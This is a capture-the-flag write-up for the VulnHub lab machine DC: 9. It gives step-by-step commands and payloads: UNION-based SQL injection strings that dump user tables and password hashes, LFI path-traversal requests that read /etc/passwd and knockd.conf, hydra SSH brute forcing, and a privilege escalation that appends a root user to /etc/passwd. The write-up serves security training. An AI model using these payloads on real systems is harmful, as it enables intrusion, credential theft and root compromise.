VulnHub: DC: 9

DC: 9

Initial foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.49.

2. Port scan

nmap -Pn 10.0.2.49
nmap -Pn -p1000- 10.0.2.49

There’re 1 filtered port, 22 and 1 open port, 80.

3. OS and service scan

nmap -A -p22,80 10.0.2.49

There’s Apache httpd 2.4.38 on port 80.

4. Vuln scan

nmap --script vuln -p22,80 10.0.2.49

Nothing.

Service Enumeration

HTTP service

1. Nikto scan

nikto -h http://10.0.2.49

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.49/ -x php,txt,html,sh,cgi,bak -q

3. Access HTTP site

/index.php

/display.php

/search.php -> possible SQL injection

/manage.php -> possible SQL injection

It’s funny that when I accessed session.php and logout.php. I was redirected to manage.php and had admin session.

Conclusion:

There’re two possible SQLi vulnerabilities to test in search.php and manage.php

If you do a very good reconnaissance and discover that logout.php is redirected to manage.php w/ admin session. It will save a lot of time. However, I will demonstrate how to test for SQLi starting from search.php.

Exploitation

1. Supply an input

2. Intercept w/ Burp Suite

3. Send to the intruder

At the right panel -> Clear $

Double click at “test” and click “add $” at the right panel

Set up the payload. This payload is based on my experience. I already uploaded it on Github.

Here’s my Github link.

ratiros01/sqli_payload

Start the attack. Here’s the result. In this case, you will see the difference in length. Let’s check it out.

Test the payload. I will use:

' or 1=1--

Here’s the result.

4. Next is to test the union query to find columns

Change the value to be:

' union select 1--

Add $ on “1”

Load the payload

Here’s the GitHub link.

ratiros01/sqli_payload

Start the attack, the column number is six.

Test the payload

' union select 1,2,3,4,5,6--

Succeeded!!!

5. Find the version, hostname, current database

' union select 1,@@version,@@hostname,database(),5,6--

Note it.

6. Get other databases

' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--

I don't have any results.

Fix by change comment according from Intruder attack

I will change from:

-- to -- -

Here’s the new query:

' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- -

Result.

Note it.

7. “Staff” schema

Get table name

' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='Staff'-- -

Note it

Get columns

' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='Users'  and table_schema='Staff'-- -

Note it

Get data

' union select 1,2,group_concat(UserID,":",Username,":",Password),4,5,6 from Staff.Users-- -

Note it

Crack the hash w/ crackstation

8. “users” schema

Get tables

' union select 1,2,3,group_concat(table_name,":"),5,6 from information_schema.tables where table_schema='users'-- -

Get columns

' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='UsersDetails'  and table_schema='users'-- -

Get data

' union select 1,2,group_concat(id,':',username,':',password),4,5,6 from users.UserDetails-- -

View page source

Copy, organize and save it as raw.txt

Extract only usernames and save as users.txt

cat raw.txt | cut -d ":" -f2 > users.txt
cat users.txt

Extract only passwords and save as passwords.txt

cat raw.txt | cut -d ":" -f3 | cut -d "," -f1 > passwords.txt
cat passwords.txt

Conclusion:

This database has data structure like this:

Database -> Tables -> Columns

• Staff -> StaffDetails, Users ->UserID, Username, Password

Data:

1:admin:856f5de590ef37314e7c3bdf6f8a66dc

Crack the hash -> transorbital1

• users -> UsersDetails -> id,firstname,lastname,username,password,reg_date

Data is saved as raw.txt

9. Searching for expoit in manage.php

You will see the “File does note exist” string. I bet this is a hint about LFI.

View page source, nothing much.

I will find the parameter w/ wfuzz, but first I need to intercept the page request and copy the Cookie value.

Fuzz w/ wfuzz

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php

You will see that there’re much non-related strings and their length is 100.

Hide string w/ length value is 100. by supplying “--hw 100”.

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=index.php

Nothing.

Change index.php to “../../../../../etc/passwd”

wfuzz -b "PHPSESSID=mfbitk09jct79hpf6i20fr3lko" --hw 100 -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://10.0.2.49/manage.php?FUZZ=../../../../../../../etc/passwd

Now I got the result.

Test the parameter

Comparing w/ credential from raw.txt I may use these to login, but SSH is filtered. The possibility is there’s a port-knocking function.

The typical port-knocking configuration is located in:

/etc/knockd.conf

Supply in w/ LFI. There’s a result.

View page source for easier sequence identification.

10. Open filtered port by using the sequence result.

for p in 7469 8475 9842; do nmap -n -v0 -Pn --max-retries 0 -p $p 10.0.2.49; done

Test SSH connection, now I can connect the SSH service.

11. Brute-forcing for the credentials.

hydra -L users.txt -P passwords.txt 10.0.2.49 ssh -t 4 -u

I got 3 credentials.

Privilege Escalation

1. I will start w/ janitor

ssh janitor@10.0.2.49
password: Ilovepeepee
ls -la

Lucky me, I found a hidden directory.

cd .secrets-for-putin
ls -la
cat passwords-found-on-post-it-notes.txt

Now I got another set of passwords.

Save it as janitor_password.txt

2. Another SSH brute-forcing.

hydra -L users.txt -P janitor_password.txt 10.0.2.49 ssh -t 4 -u

Starting from “fredf”. Login to SSH service.

ssh fredf@10.0.2.49
password: B4-Tru3-001
sudo -l

I can run this binary.

Test the command

sudo /opt/devstuff/dist/test/test 

Test the usage

echo "Hello World" > for_read
sudo /opt/devstuff/dist/test/test for_read for_append
ls -la 
cat for_append

Next, I will append another user w/ password in /etc/passwd

Create password

openssl passwd -1 -salt new password123

nano strings_to_append

Add the data as shown in the screenshot.

Append /etc/passwd

sudo /opt/devstuff/dist/test/test strings_to_append /etc/passwd

Verify /etc/passwd

cat /etc/passwd

Now I got “newuser”.

Login as new user

su newuser
password: password123
cd /root
ls -la

Now I got the flag.

cat theflag.txt